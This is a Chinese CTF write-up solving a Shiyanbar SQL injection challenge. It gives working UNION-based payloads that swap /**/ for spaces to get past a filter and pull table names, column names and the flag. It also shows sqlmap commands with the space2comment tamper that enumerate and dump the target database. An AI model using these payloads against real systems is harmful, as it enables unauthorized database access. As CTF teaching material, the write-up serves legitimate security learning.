美文网首页ctfCTF-Web安全
实验吧-web-简单的sql注入2

实验吧-web-简单的sql注入2

作者: 简言之_ | 来源:发表于2019-01-29 12:18 被阅读1次

    本系列文集:实验吧-Write up --将持续更新 觉得还不错请给个喜欢,感谢!

    方法一手动注入

    简单的注入测试:
    1   正常
    1'  报错
    1' or '1'='1    SQLi detected!
    1'or'1'='1      全部数据
    以上说明空格被过滤掉
    

    1.查询数据库中的表(用/**/绕过空格)

    1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
    
    图片.png
    发现flag表
    2.查询flag表中字段名
    1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
    
    图片.png
    发现flag字段名
    3.最后构造出poc
    1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
    
    图片.png
    方法二sqlmap注入
    点击了解sqlmap详细用法:sqlmap用于sql注入语法

    1.查询当前数据库(空格被过滤可以使用tamper脚本中space2comment)
    sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs

    图片.png
    发现web1数据库
    2.查询数据库中的表
    sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --tables -D web1 图片.png
    发现flag表
    3.查询flag表中字段名
    sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --columns -T flag -D web1 图片.png
    发现flag字段
    4.查询字段flag信息
    sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dump -C flag -T flag -D web1 图片.png

    相关文章

      网友评论

        本文标题:实验吧-web-简单的sql注入2

        本文链接:https://www.haomeiwen.com/subject/icztsqtx.html